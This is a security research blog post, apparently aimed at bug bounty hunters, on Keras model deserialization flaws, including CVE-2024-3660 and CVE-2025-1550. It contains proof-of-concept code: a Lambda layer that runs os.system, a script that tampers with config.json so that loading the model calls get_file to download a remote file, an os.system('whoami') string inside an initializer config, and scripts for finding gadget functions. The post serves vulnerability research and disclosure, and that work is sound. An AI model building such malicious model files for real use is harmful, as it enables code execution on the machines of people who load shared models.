The ability to save (serialize) and load (deserialize) trained models is fundamental to machine learning frameworks. Training a neural network can take hours, days or even weeks on expensive hardware, so developers need to save their work and share it with others. Every major framework (PyTorch, TensorFlow, scikit-learn) implements these features, because without them machine learning would be impractical at scale.
In this blog post, we will explore how Keras handles model serialization and deserialization. We will revisit the infamous Lambda layer exploit and recent security improvements, and explain why significant vulnerabilities might still exist in Keras’s deserialization pipeline. Finally, we will share practical techniques you can use in your own search for Model File Vulnerabilities (MFVs) in Keras models.
Keras Model Evolution
Keras has undergone significant evolution in its model serialization approach over the years. Originally developed as an independent library by François Chollet, Keras was later integrated into TensorFlow as tf.keras, becoming TensorFlow’s official high-level API. However, with the release of Keras 3.0 in late 2023, the framework became standalone again, supporting multiple backends (JAX, TensorFlow, PyTorch). The Keras 3.0 announcement provides more details on what changed.
Keras 3 also made the native .keras format its standard save format. It is more secure than the legacy HDF5 format, but it still presents interesting attack surfaces for security researchers.
Understanding Keras Model Files
Before diving into the Lambda layer exploit, let's first understand how Keras saves models and what files are generated. This will help us grasp the attack surface better.
Creating a Simple Keras Model
Let's start with a basic Sequential model:
import keras
from keras.models import Sequential
from keras.layers import Dense, Input
# Create a simple model
model = Sequential([
    Input(shape=(10,)),
    Dense(64, activation='relu', name='hidden_layer'),
    Dense(1, activation='sigmoid', name='output_layer')
])
# Compile the model
model.compile(optimizer='adam', loss='binary_crossentropy')
# Save the model
model.save('simple_model.keras')
What's Inside a .keras File?
The .keras file is actually a ZIP archive containing multiple files.
> unzip -l simple_model.keras
Archive: simple_model.keras
Length Date Time Name
--------- ---------- ----- ----
116 2024-01-01 12:00 metadata.json
2847 2024-01-01 12:00 config.json
123456 2024-01-01 12:00 model.weights.h5
--------- -------
126419 3 files
The three files serve different purposes:
- metadata.json - Basic model information (Keras version, save date)
- config.json - Model architecture definition (this is our primary attack surface)
- model.weights.h5 - Model weights stored in HDF5 format
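If you want to inspect an archive from Python instead of with unzip, the standard zipfile module is enough. The sketch below is a minimal helper that assumes the member names listed above; inspect_keras_archive is a hypothetical name, and the in-memory archive is a stand-in with placeholder contents so the example runs without Keras installed.

```python
import io
import json
import zipfile


def inspect_keras_archive(source):
    """Return (member names, parsed metadata.json, parsed config.json) for a .keras file."""
    with zipfile.ZipFile(source) as zf:
        names = zf.namelist()
        metadata = json.loads(zf.read("metadata.json"))
        config = json.loads(zf.read("config.json"))
    return names, metadata, config


# Stand-in archive with placeholder contents (assumption: mirrors the layout above).
# Pass a real path such as "simple_model.keras" to inspect an actual model.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("metadata.json", json.dumps({"keras_version": "3.x"}))
    zf.writestr("config.json", json.dumps({"module": "keras", "class_name": "Sequential", "config": {}}))
    zf.writestr("model.weights.h5", b"")  # placeholder bytes, not a real HDF5 file
buf.seek(0)

names, metadata, config = inspect_keras_archive(buf)
print(names)
print(config["module"], config["class_name"])
```

Reading config.json this way parses it as plain JSON and never hands it to Keras, which makes it a safe first step when examining an untrusted model.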
This separation is typical across many ML frameworks. A model consists of two main components: the architecture, which defines the computational structure (layer definitions, activation functions, optimizer settings), and the weights, which are the numerical parameters learned during training and are stored as binary data. Keeping the two apart gives flexibility in sharing and deploying models, but it also creates distinct attack surfaces, particularly in the architecture definition, which tells the loader what code to import and run.
In the context of Keras models, the most interesting file is config.json. It holds the architecture definition, and its contents decide which Python classes and functions Keras imports and invokes when the model is loaded.
The Security-Critical config.json
Here’s what a typical config.json looks like for a model with a single Dense layer (abridged):
{
"module": "keras",
"class_name": "Sequential",
"config": {
"layers": [
{
"module": "keras.layers",
"class_name": "Dense",
"config": {
"units": 64,
"activation": "relu",
"kernel_initializer": {
"module": "keras.initializers",
"class_name": "GlorotUniform",
"config": {"seed": null}
}
}
}
],
"compile_config": {
"optimizer": {
"module": "keras.optimizers",
"class_name": "Adam",
"config": {"learning_rate": 0.001}
}
}
}
}
The Security Implications
Notice how the config.json contains:
- Module names that Keras will import (keras.layers, keras.initializers)
- Class names that will be looked up by name in the imported module
- Configuration parameters passed directly to constructors
- Nested objects that create recursive deserialization
This structure creates multiple attack vectors that we'll explore next.
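Because every nested object carries its own module and class_name, you can enumerate everything a config will ask Keras to resolve before loading it. The following is a minimal sketch that assumes the config layout shown above (abridged into a string); collect_references is a hypothetical helper, not part of Keras.

```python
import json

# Abridged copy of the config.json example above.
CONFIG_JSON = """
{"module": "keras", "class_name": "Sequential",
 "config": {"layers": [{"module": "keras.layers", "class_name": "Dense",
   "config": {"units": 64, "activation": "relu",
     "kernel_initializer": {"module": "keras.initializers",
       "class_name": "GlorotUniform", "config": {"seed": null}}}}],
  "compile_config": {"optimizer": {"module": "keras.optimizers",
    "class_name": "Adam", "config": {"learning_rate": 0.001}}}}}
"""


def collect_references(node, found=None):
    """Recursively collect every (module, class_name) pair in a Keras config."""
    if found is None:
        found = []
    if isinstance(node, dict):
        if "class_name" in node:
            found.append((node.get("module"), node["class_name"]))
        for value in node.values():
            collect_references(value, found)
    elif isinstance(node, list):
        for item in node:
            collect_references(item, found)
    return found


for module, class_name in collect_references(json.loads(CONFIG_JSON)):
    print(f"{module}.{class_name}")
```

Running it on the config.json extracted from a real .keras file gives a quick inventory of every module and name the loader will try to resolve.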
The Lambda Layer Exploit: CVE-2024-3660
The Lambda layer exploit was a critical vulnerability that allowed arbitrary code execution during model loading. Let's examine how it worked.
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Lambda
import tensorflow as tf
# Create a model with a Lambda layer that executes malicious code.
model = Sequential([
    Lambda(lambda x: eval("__import__('os').system('touch /tmp/poc')" or x)),
])
# Save the model in the native .keras format.
model.save("lambda_model.keras")
Inspecting the config.json file shows the definition for the Lambda layer:
{
"module": "keras.layers",
"class_name": "Lambda",
"config": {
"name": "lambda",
"function": {
"class_name": "__lambda__",
"config": {
"code": "4wEAAAAAAAAAAAAAAAMAAAADAAAA8yAAAACXAHQBAAAAAAAAAAAAAGQBpgEAAKsBAAAAAAAAAABT\nACkCTvopX19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ3RvdWNoIC90bXAvcG9jJykpAdoEZXZhbCkB\n2gF4cwEAAAAg+kwvdmFyL2ZvbGRlcnMvczkvcV96Nno5MTk1ZDlmenk1ejY0a2N4Z204MDAwMGdu\nL1QvaXB5a2VybmVsXzExODM2LzkzNTExNjk1LnB5+gg8bGFtYmRhPnIGAAAABwAAAHMPAAAAgACV\nVNAaRdEVS9QVS4AA8wAAAAA=\n"
}
}
}
}
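Before loading a suspicious file, a quick static check can reveal what the embedded bytecode does. The sketch below base64-decodes the code value from the config above and prints runs of printable ASCII, in the spirit of the Unix strings tool. It deliberately never calls marshal.loads; printable_strings is a hypothetical helper, and the approach is a heuristic that obfuscated payloads can evade.

```python
import base64
import re

# The "code" value from the Lambda layer config above, newlines included.
LAMBDA_CODE = (
    "4wEAAAAAAAAAAAAAAAMAAAADAAAA8yAAAACXAHQBAAAAAAAAAAAAAGQBpgEAAKsBAAAAAAAAAABT\n"
    "ACkCTvopX19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ3RvdWNoIC90bXAvcG9jJykpAdoEZXZhbCkB\n"
    "2gF4cwEAAAAg+kwvdmFyL2ZvbGRlcnMvczkvcV96Nno5MTk1ZDlmenk1ejY0a2N4Z204MDAwMGdu\n"
    "L1QvaXB5a2VybmVsXzExODM2LzkzNTExNjk1LnB5+gg8bGFtYmRhPnIGAAAABwAAAHMPAAAAgACV\n"
    "VNAaRdEVS9QVS4AA8wAAAAA=\n"
)


def printable_strings(data, min_len=4):
    """Return runs of at least min_len printable ASCII bytes, like `strings`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [match.decode("ascii") for match in re.findall(pattern, data)]


raw = base64.b64decode(LAMBDA_CODE)  # the decoder discards the embedded newlines
for s in printable_strings(raw):
    print(s)
```

The os.system command string stands out immediately in the output, next to the name eval and the filename recorded when the lambda was compiled.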
How the Lambda Exploit Works
Keras deserializes layers recursively. Each layer class defines a from_config classmethod, which Keras calls to rebuild a layer of that type from its saved config. Here is the vulnerable code snippet from the Lambda layer:
# https://github.com/keras-team/keras/blob/v3.10.0/keras/src/layers/core/lambda_layer.py
@classmethod
def from_config(cls, config, custom_objects=None, safe_mode=None):
    safe_mode = safe_mode or serialization_lib.in_safe_mode()
    fn_config = config["function"]
    # This is where the vulnerability occurs
    if (
        isinstance(fn_config, dict)
        and "class_name" in fn_config
        and fn_config["class_name"] == "__lambda__"
    ):
        cls._raise_for_lambda_deserialization("function", safe_mode)  # Safe mode check
        inner_config = fn_config["config"]
        fn = python_utils.func_load(
            inner_config["code"],  # Base64-encoded bytecode
            defaults=inner_config["defaults"],
            closure=inner_config["closure"],
        )
        config["function"] = fn
The vulnerability lies in the call to python_utils.func_load() with the base64-encoded bytecode. This function decodes the string and passes the bytes to marshal.loads(), which rebuilds a Python code object that is then wrapped in a function. The payload does not run during unmarshaling itself; it runs when Keras calls the layer, which can already happen while the model is being rebuilt during loading. The payload in our example is the marshaled bytecode of the lambda defined earlier:
lambda x: eval("__import__('os').system('touch /tmp/poc')" or x)
In other words, Keras was loading user-provided bytecode directly. Keras now enforces safe mode by default, which blocks deserialization of such Lambda layers unless the user explicitly passes safe_mode=False.
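The mechanism can be reproduced with the standard library alone. The sketch below is a simplified stand-in for the idea behind python_utils.func_load and its serializing counterpart, not their actual code (dump_function and load_function are hypothetical names): it marshals a lambda's code object, base64-encodes it, and rebuilds a callable from it. A harmless print() stands in for the os.system payload.

```python
import base64
import marshal
import types


def dump_function(fn):
    """Encode a function's bytecode as base64 marshal data (simplified stand-in)."""
    return base64.b64encode(marshal.dumps(fn.__code__)).decode("ascii")


def load_function(encoded):
    """Rebuild a callable from base64 marshal data (simplified stand-in)."""
    code = marshal.loads(base64.b64decode(encoded))  # only rebuilds a code object
    return types.FunctionType(code, globals())


# Harmless stand-in for the `eval(...) or x` payload: print() returns None,
# so the lambda still returns its input, just like the malicious layer.
encoded = dump_function(lambda x: print("payload ran") or x)
restored = load_function(encoded)
print("function restored; payload has not run yet")
result = restored(41)  # the side effect fires here, on the call
print(result)
```

Restoring the function prints nothing from the payload; it fires only when the function is called, which is why a Lambda layer is dangerous as soon as Keras invokes it.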
Arbitrary Module Loading: The Deserialization Pipeline
Let's step up a level and look at what happens under the hood when Keras deserializes a model. The main entry point is:
# https://github.com/keras-team/keras/blob/v3.10.0/keras/src/saving/serialization_lib.py
# (simplified excerpt)
def deserialize_keras_object(config, custom_objects=None, safe_mode=True, **kwargs):
    # Step 1: Handle simple types
    if isinstance(config, PLAIN_TYPES) or not isinstance(config, dict):
        return config
    # Step 2: Extract serialization fields
    module = config.get("module")  # "keras.layers"
    class_name = config.get("class_name")  # "Dense", "Lambda", etc.
    registered_name = config.get("registered_name")
    inner_config = config.get("config", {})
    # Step 3: Resolve the class/function
    cls = _retrieve_class_or_fn(
        class_name,
        registered_name,
        module,
        obj_type="class",
        full_config=config,
        custom_objects=custom_objects,
    )
    # Step 4: Return plain functions as-is; rebuild classes from their config
    if isinstance(cls, types.FunctionType):
        return cls
    instance = cls.from_config(inner_config)
    return instance
The security-critical function is _retrieve_class_or_fn, which underwent significant changes in recent versions.
def _retrieve_class_or_fn(
    name, registered_name, module, obj_type, full_config, custom_objects=None
):
    # ... truncated for brevity ...
    package = module.split(".", maxsplit=1)[0]
    if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:
        try:
            mod = importlib.import_module(module)
            obj = vars(mod).get(name, None)
            if obj is not None:
                return obj
        except ModuleNotFoundError:
            raise TypeError(...)
    raise TypeError(...)
Critical Vulnerability in Keras Version <= 3.8
Our Huntr researchers discovered a critical vulnerability in Keras versions prior to 3.9; you can read the details in these reports here and here. It was later independently reported as CVE-2025-1550. The vulnerability allowed arbitrary Python modules to be imported, and their functions executed, when a model is loaded. The key issue was the unrestricted use of importlib.import_module(...). Here is the vulnerable code from Keras 3.8.0:
# https://github.com/keras-team/keras/blob/v3.8.0/keras/src/saving/serialization_lib.py
def _retrieve_class_or_fn(
    name, registered_name, module, obj_type, full_config, custom_objects=None
):
    # .... Truncated ...
    # Otherwise, attempt to retrieve the class object given the `module`
    # and `class_name`. Import the module, find the class.
    try:
        mod = importlib.import_module(module)
    except ModuleNotFoundError:
        raise TypeError(...)
    obj = vars(mod).get(name, None)
    # Special case for keras.metrics.metrics
    if obj is None and registered_name is not None:
        obj = vars(mod).get(registered_name, None)
    if obj is not None:
        return obj
    raise TypeError(...)
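To make the difference concrete, here is a toy model of the two resolution strategies. It is not Keras code: resolve_unrestricted roughly approximates the 3.8.0 logic above, resolve_allowlisted adds a package check modeled on the 3.9+ allowlist, and a harmless os.path.join stands in for a dangerous target.

```python
import importlib

# Package allowlist modeled on the 3.9+ check shown earlier.
ALLOWED_PACKAGES = {"keras", "keras_hub", "keras_cv", "keras_nlp"}


def resolve_unrestricted(config):
    """Toy pre-3.9 behaviour: import whatever module the config names."""
    mod = importlib.import_module(config["module"])
    obj = vars(mod).get(config["class_name"])
    if obj is None:
        raise TypeError(f"Could not locate {config['class_name']!r}")
    return obj


def resolve_allowlisted(config):
    """Toy 3.9+ behaviour: refuse modules outside the allowlisted packages."""
    package = config["module"].split(".", maxsplit=1)[0]
    if package not in ALLOWED_PACKAGES:
        raise TypeError(f"Module {config['module']!r} is not allowed")
    return resolve_unrestricted(config)


# A config entry pointing at a standard-library function instead of a Keras class.
hostile = {"module": "os.path", "class_name": "join", "config": {}}

print(resolve_unrestricted(hostile))  # resolves to the real os.path.join
try:
    resolve_allowlisted(hostile)
    blocked = False
except TypeError as exc:
    blocked = True
    print("blocked:", exc)
```

Note that the allowlist is checked only at the package level: any module under keras.* still passes, which is exactly the opening exploited later in this post.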
Keras Security Improvements
Keras maintainers took concrete steps to fix many weaknesses in the deserialization libraries. Following the security principle of never trusting user input, they implemented several defenses:
- Module Allowlist: Keras now only allows importing modules within the Keras ecosystem: `keras, keras_hub, keras_cv, keras_nlp`.
- Safe Mode by Default: safe_mode=True is enforced by default, which blocks deserializing Lambda layers that contain serialized Python bytecode.
- Basic Type Checking: Ensures that objects being deserialized are of the expected type (see https://github.com/keras-team/keras/pull/20751).
These improvements significantly reduced the attack surface, but didn't eliminate it entirely.
What's Still Exploitable
Despite these fixes, the attack surface of Keras remains substantial.
The allowlist is still very permissive, because every module under the allowed packages is reachable. For example, get_file in keras.utils downloads a remote file to a specified directory. This function could potentially be referenced from a model configuration to download arbitrary files to the victim's machine.
Here's a proof-of-concept that demonstrates this:
import json
import zipfile

import keras

# Step 1: Create a simple base model
model = keras.Sequential([
    keras.layers.Input(shape=(1,)),
    keras.layers.Lambda(lambda x: x, name='placeholder_lambda'),  # Placeholder
    keras.layers.Dense(1, activation='sigmoid')
])
model.compile(optimizer='adam', loss='mse')
# Step 2: Save the legitimate model
model.save('model.keras')
# Step 3: Read the original config to preserve layer structure
with zipfile.ZipFile('model.keras', 'r') as zf:
    original_config = json.loads(zf.read('config.json').decode())
# Step 4: Inject our custom Lambda layer config
for layer in original_config['config']['layers']:
    if layer['class_name'] == 'Lambda' and layer['config']['name'] == 'placeholder_lambda':
        # Replace with malicious config
        layer['config'] = {
            'name': 'malicious_downloader',
            'trainable': False,
            'function': {
                'module': 'keras.utils',
                'class_name': 'get_file',
                'config': None,
                'registered_name': None
            },
            'arguments': {
                'origin': 'https://httpbin.org/json',
                'cache_dir': '/tmp',
                'force_download': True
            }
        }
        break
# Step 5: Replace config.json in the .keras file
with zipfile.ZipFile('model.keras', 'r') as zf_read:
    with zipfile.ZipFile('model_malicious.keras', 'w') as zf_write:
        # Copy all files except config.json
        for item in zf_read.infolist():
            if item.filename != 'config.json':
                data = zf_read.read(item.filename)
                zf_write.writestr(item, data)
            else:
                # Write modified config.json
                zf_write.writestr('config.json', json.dumps(original_config, indent=2))
# Step 6: Load the malicious model (safe_mode=True is also the default)
m = keras.models.load_model('model_malicious.keras', safe_mode=True)
This code injects a Lambda layer whose function is a reference to keras.utils.get_file rather than serialized Python bytecode. The safe mode check in Lambda.from_config only fires for "__lambda__" entries, so this config passes it and the function is resolved through the regular deserialization path instead. This provides a good starting point for exploring weaknesses in Keras's deserialization library.
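Defenders and researchers alike can flag this pattern statically. Below is a minimal sketch that assumes the config layout used in the PoC; find_lambda_function_refs is a hypothetical helper that reports every Lambda layer whose function is a module reference rather than a serialized __lambda__ entry.

```python
def find_lambda_function_refs(config):
    """Return (layer name, module, function name) for Lambda layers whose
    `function` entry references a module function instead of bytecode."""
    hits = []

    def walk(node):
        if isinstance(node, dict):
            if node.get("class_name") == "Lambda":
                layer_config = node.get("config") or {}
                fn = layer_config.get("function")
                if isinstance(fn, dict) and fn.get("class_name") != "__lambda__":
                    hits.append((layer_config.get("name"), fn.get("module"), fn.get("class_name")))
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(config)
    return hits


# Abridged version of the tampered config produced by the PoC.
sample = {
    "module": "keras",
    "class_name": "Sequential",
    "config": {"layers": [{
        "module": "keras.layers",
        "class_name": "Lambda",
        "config": {
            "name": "malicious_downloader",
            "function": {"module": "keras.utils", "class_name": "get_file",
                         "config": None, "registered_name": None},
            "arguments": {"origin": "https://httpbin.org/json"},
        },
    }]},
}
print(find_lambda_function_refs(sample))
```

To scan a real file, parse its config with json.loads(zipfile.ZipFile(path).read("config.json")) and pass the result in.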
Important Limitation: The Lambda layer's call method forwards every entry in the layer's arguments config as a keyword argument, but it always passes the layer input as the first positional argument:
# https://github.com/keras-team/keras/blob/v3.10.0/keras/src/layers/core/lambda_layer.py
def call(self, inputs, mask=None, training=None):  # inputs is passed as the first argument
    # We must copy for thread safety,
    # but it only needs to be a shallow copy.
    kwargs = {k: v for k, v in self.arguments.items()}
    if self._fn_expects_mask_arg:
        kwargs["mask"] = mask
    if self._fn_expects_training_arg:
        kwargs["training"] = training
    return self.function(inputs, **kwargs)
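Because the first parameter always receives the layer input, this limits which functions make useful gadgets. Still, it demonstrates that Keras can be made to call functions from allowlisted modules that a model config should never reference.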
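When evaluating a candidate gadget, it helps to check how a call shaped like function(inputs, **arguments) would bind. The sketch below uses inspect.signature(...).bind for that. bind_like_lambda_call and fake_get_file are hypothetical; fake_get_file only mimics a get_file-like parameter order, so check the real signature of any function you target.

```python
import inspect


def bind_like_lambda_call(fn, arguments, inputs="<layer inputs>"):
    """Bind fn(inputs, **arguments) the way Lambda.call invokes its function.

    Returns the bound parameters, or raises TypeError if the call cannot bind.
    """
    bound = inspect.signature(fn).bind(inputs, **arguments)
    return dict(bound.arguments)


# Hypothetical stand-in with a get_file-like parameter order (not Keras's real signature).
def fake_get_file(fname=None, origin=None, cache_dir=None, force_download=False):
    return fname, origin


binding = bind_like_lambda_call(
    fake_get_file,
    {"origin": "https://example.com/data.json", "cache_dir": "/tmp", "force_download": True},
)
print(binding)  # `fname` receives the layer inputs, not an attacker-chosen value
```

If bind raises TypeError, the function cannot be reached through a Lambda layer with that arguments dictionary; if it succeeds, look at which parameter ends up holding the layer input.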
Your Exploration Toolkit: Finding Your Own MFVs
Here are some practical techniques to help with your own exploration:
Systematic Function Discovery
Systematically explore the functions in Keras's allowlisted packages (keras, keras_nlp, keras_cv, keras_hub) that might serve as exploitation gadgets, especially when combined with the Lambda layer:
import inspect

import keras

module = keras.utils
callables = []
classes = []
functions = []
modules = []
for name in dir(module):
    if name.startswith('_'):  # Skip private attributes
        continue
    obj = getattr(module, name)
    if inspect.ismodule(obj):  # Submodules are not callable, so check them first
        modules.append((name, obj))
        continue
    if not callable(obj):
        continue
    callables.append((name, obj))
    if inspect.isclass(obj):
        classes.append((name, obj))
    elif inspect.isfunction(obj):
        functions.append((name, obj))
# Print the signatures of the first 10 public functions found
for name, func in functions[:10]:
    sig = inspect.signature(func)
    print(f"{name}{sig} -> {func}")
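The script above lists everything; to narrow the results, a simple heuristic is to flag functions whose parameter names hint at filesystem or network access. This is a minimal sketch: find_candidate_gadgets is hypothetical, the keyword list is an assumption you should tune, and the demo runs on the standard-library shutil module so it works without Keras installed.

```python
import inspect
import shutil


def find_candidate_gadgets(module, keywords=("path", "dir", "file", "url", "origin")):
    """Heuristic: list public functions whose parameter names mention a keyword."""
    hits = []
    for name in dir(module):
        if name.startswith("_"):
            continue
        obj = getattr(module, name)
        if not inspect.isfunction(obj):
            continue
        try:
            params = inspect.signature(obj).parameters
        except (TypeError, ValueError):
            continue  # some callables have no retrievable signature
        matched = [p for p in params if any(k in p.lower() for k in keywords)]
        if matched:
            hits.append((name, matched))
    return hits


# Demo on a standard-library module; pass keras.utils (or another allowlisted module) instead.
for name, params in find_candidate_gadgets(shutil):
    print(name, params)
```

Keyword matching produces false positives and misses gadgets with generic parameter names, so treat the output as a reading list rather than a verdict.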
Direct Deserialization Testing
Experiment by directly deserializing layer configs to see what parameters they accept:
import keras

layer_config = {
    "module": "keras.layers",
    "class_name": "Dense",
    "config": {
        "units": 64,
        "kernel_initializer": {
            "module": "keras.initializers",
            "class_name": "Constant",
            "config": {
                "value": "__import__('os').system('whoami')"  # Can we exploit this further?
            }
        }
    }
}
# Successful layer object creation indicates the arguments were correctly parsed.
obj = keras.saving.deserialize_keras_object(layer_config)
Legacy Versions and File Formats
Keras maintains backward compatibility and supports legacy file formats. These formats might not have the same robust checks against deserialization exploits. Additionally, there are at least three versions of Keras code:
- TensorFlow's built-in Keras (tensorflow/keras) - slated for deletion
- tf-keras (keras-team/tf-keras) - getting regular releases
- Official Keras 3 (keras-team/keras) - multi-backend support
Each version might have different security implementations and attack surfaces.
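A practical first step is to check which of these code bases a target environment actually has installed. The sketch below uses importlib.metadata; it assumes keras, tf-keras and tensorflow are the PyPI distribution names for the three code lines above, and installed_versions is a hypothetical helper.

```python
from importlib import metadata

# Assumed PyPI distribution names for the three Keras code lines.
DISTRIBUTIONS = ("keras", "tf-keras", "tensorflow")


def installed_versions(names=DISTRIBUTIONS):
    """Map each distribution name to its installed version, or None if absent."""
    versions = {}
    for name in names:
        try:
            versions[name] = metadata.version(name)
        except metadata.PackageNotFoundError:
            versions[name] = None
    return versions


print(installed_versions())
```

Knowing the exact versions tells you which deserialization code path, and which of the fixes discussed above, applies to the environment you are testing.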
Why This Matters For Bug Bounty Hunters
For bug bounty hunters, this isn't just an academic exercise; it's a prime opportunity to discover valuable vulnerabilities in AI/ML tools. Here's why:
Launchpad for Discovery: Use the examples in this blog as a springboard. Explore Keras model formats in depth, and you're likely to find more flaws that haven't been discovered yet.
Lucrative Bounties: Each validated Model File Vulnerability (MFV) can earn you up to $3,000+ on Huntr, boosting both your reputation and your income.
Under-explored Territory: While web application security is heavily researched, ML framework security remains relatively unexplored, giving you a competitive advantage.
Real-world Impact: These vulnerabilities affect production systems at major companies using Keras for ML workloads, making your discoveries highly valuable.
Conclusion
Keras has made significant strides in securing model deserialization since the Lambda layer exploit, but the fundamental challenge remains: balancing functionality with security in a framework designed for flexibility. The current allowlist approach, while better than unrestricted imports, still provides a substantial attack surface for creative researchers.
The key takeaway for security researchers is that Model File Vulnerabilities represent a rich, under-explored area with real-world impact. As ML adoption continues to accelerate and model sharing becomes more common, these attack vectors will only become more valuable to understand and exploit responsibly.
Whether you're a seasoned bug bounty hunter or new to ML security, now is the perfect time to dive into this space. The techniques and examples in this post should give you a solid foundation to start your own exploration of Keras MFVs and potentially discover the next critical vulnerability in one of the world's most popular ML frameworks.